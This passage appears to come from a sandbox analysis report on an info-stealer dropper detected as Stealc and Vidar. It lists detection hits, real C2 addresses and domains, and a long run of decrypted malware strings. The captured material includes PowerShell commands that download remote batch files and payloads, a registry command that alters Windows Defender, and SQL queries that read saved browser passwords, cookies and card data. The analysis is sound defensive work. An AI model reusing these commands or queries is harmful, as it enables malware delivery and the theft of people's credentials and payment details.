\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powersh

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe, ProcessId: 1504, TargetFilename: C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", CommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1048, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", ProcessId: 5428, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", CommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1048, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')", ProcessId: 5428, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5548, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Set custom UserAgent and download file via Powershell

Source: Process started

Author: Joe Security: Data: Command: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')", CommandLine: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1048, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')", ProcessId: 6980, ProcessName: powershell.exe

Snort Signatures

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.5

Timestamp:	04/26/24-17:11:12.318020
SID:	2051828
Source Port:	80
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 185.172.128.76

Timestamp:	04/26/24-17:11:11.271187
SID:	2044243
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 185.172.128.76

Timestamp:	04/26/24-17:11:11.968319
SID:	2044244
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) - Source IP: 192.168.2.5 - Destination IP: 185.172.128.90

Timestamp:	04/26/24-17:11:01.922119
SID:	2856233
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000008.00000003.2144160869.00000000041B0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Multi AV Scanner detection for domain / URL

Source: env-3936544.jcloud.kz	Virustotal: Detection: 5%	Perma Link
Source: c.574859385.xyz	Virustotal: Detection: 8%	Perma Link
Source: monoblocked.com	Virustotal: Detection: 16%	Perma Link
Source: service-domain.xyz	Virustotal: Detection: 10%	Perma Link
Source: api.check-data.xyz	Virustotal: Detection: 6%	Perma Link
Source: api4.check-data.xyz	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tiktok[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tiktok[1].exe	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Virustotal: Detection: 30%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\EHJDHJKFIE.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\EHJDHJKFIE.exe	Virustotal: Detection: 50%	Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetProcAddress
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: LoadLibraryA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: lstrcatA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: OpenEventA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CreateEventA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CloseHandle
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Sleep
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: VirtualFree
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetSystemInfo
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: VirtualAlloc
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: HeapAlloc
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetComputerNameA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: lstrcpyA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetProcessHeap
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetCurrentProcess
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: lstrlenA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ExitProcess
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetSystemTime
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: advapi32.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: gdi32.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: user32.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: crypt32.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ntdll.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetUserNameA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CreateDCA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetDeviceCaps
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ReleaseDC
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sscanf
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: VMwareVMware
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: HAL9TH
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: JohnDoe
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: DISPLAY
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: http://185.172.128.76
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: /3cd2b41cbde8fc9c.php
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: /15f649199f40275b/
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: default10
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetFileAttributesA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GlobalLock
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: HeapFree
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetFileSize
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GlobalSize
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: IsWow64Process
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Process32Next
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetLocalTime
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: FreeLibrary
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetVolumeInformationA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Process32First
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetModuleFileNameA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: DeleteFileA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: FindNextFileA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: LocalFree
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: FindClose
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: LocalAlloc
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetFileSizeEx
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ReadFile
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SetFilePointer
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: WriteFile
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CreateFileA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: FindFirstFileA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CopyFileA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: VirtualProtect
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetLastError
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: lstrcpynA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: MultiByteToWideChar
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GlobalFree
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: WideCharToMultiByte
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GlobalAlloc
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: OpenProcess
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: TerminateProcess
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetCurrentProcessId
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: gdiplus.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ole32.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: bcrypt.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: wininet.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: shell32.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: psapi.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: rstrtmgr.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SelectObject
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: BitBlt
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: DeleteObject
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CreateCompatibleDC
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GdiplusStartup
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GdiplusShutdown
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GdipDisposeImage
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GdipFree
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CoUninitialize
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CoInitialize
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CoCreateInstance
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: BCryptDecrypt
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: BCryptSetProperty
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: BCryptDestroyKey
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetWindowRect
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetDesktopWindow
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetDC
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CloseWindow
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: wsprintfA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CharToOemW
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: wsprintfW
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: RegQueryValueExA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: RegEnumKeyExA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: RegOpenKeyExA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: RegCloseKey
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: RegEnumValueA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CryptUnprotectData
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SHGetFolderPathA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ShellExecuteExA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: InternetOpenUrlA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: InternetConnectA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: InternetCloseHandle
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: InternetOpenA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: HttpSendRequestA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: HttpOpenRequestA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: InternetReadFile
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: InternetCrackUrlA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: StrCmpCA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: StrStrA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: StrCmpCW
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: PathMatchSpecA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: RmStartSession
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: RmRegisterResources
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: RmGetList
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: RmEndSession
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sqlite3_open
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sqlite3_step
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sqlite3_column_text
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sqlite3_finalize
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sqlite3_close
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: sqlite3_column_blob
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: encrypted_key
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: PATH
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: NSS_Init
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: NSS_Shutdown
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: PK11_FreeSlot
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: PK11_Authenticate
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: C:\ProgramData\
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: browser:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: profile:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: url:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: login:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: password:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Opera
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: OperaGX
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Network
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: cookies
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: .txt
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: TRUE
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: FALSE
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: autofill
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: history
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: name:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: month:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: year:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: card:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Cookies
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Login Data
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Web Data
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: History
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: logins.json
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: formSubmitURL
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: usernameField
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: encryptedUsername
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: encryptedPassword
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: guid
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: cookies.sqlite
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: formhistory.sqlite
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: places.sqlite
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: plugins
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Local Extension Settings
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Sync Extension Settings
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: IndexedDB
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Opera Stable
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Opera GX Stable
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: CURRENT
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: chrome-extension_
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Local State
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: profiles.ini
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: chrome
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: opera
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: firefox
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: wallets
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ProductName
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: ProcessorNameString
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: DisplayName
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: DisplayVersion
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: Network Info:
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - IP: IP?
Source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack	String decryptor: - Country: ISO?
